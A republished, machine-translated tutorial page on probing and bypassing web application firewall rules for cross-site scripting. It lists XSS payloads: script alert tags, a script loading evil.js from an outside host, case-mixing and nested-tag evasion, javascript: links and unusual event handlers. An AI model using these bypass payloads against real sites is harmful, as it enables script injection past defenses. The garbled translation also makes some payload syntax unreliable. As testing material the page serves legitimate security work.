XSS modern WAF rules detection and bypass technology (1)

Source: Internet
Author: User
Keywords WAF
Tags application closed html script test the application use using
Initial test 1, using harmless payload, similar to <b>,<i>,<u> observation response, to determine whether the application is HTML encoding, whether the label is filtered, whether filtering <> and so on, 2, if the filter closed tag, Try the payload (<b,<i,<marquee) without the closed label to observe the response; 3, try the following payload<script>alert (1); </script><script >prompt (1); </script><script>confirm (1); </script><script src= "http://rhainfosec.com/ Evil.js > To determine whether to trigger the filtering rule, try to use the case mixed character <script>alert (1); </script>1, if the case is not good,,<script> be filtered to try <scr <script>ipt>alert (1) </scr<script>ipt>;2, use <a> label test <a href= "http://www.google.com" >clickme</a><a filtered? is the href filtered? Other content filtered? If no filtering attempts to use the <a href= "Javascript:alert (1)" >Clickme</a> try to view filtering with the wrong event <a href= "Rhainfosec.com" Onclimbatree=alert (1) >CLICKHERE</A>HTML5 has 150 event-handling functions and can try other functions <body/onhashchange=alert (1) ><a Href=#>clickit 1 2 3 4 5 Next >> View full-text navigation page 1th: initial test page 2nd: Test Other Tags page 3rd: Contextual filtering 4th page: Browser bug 5th page: Bypassing the original: XSS modern WAF rule detection and Bypass technology (1) Back to network security home

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.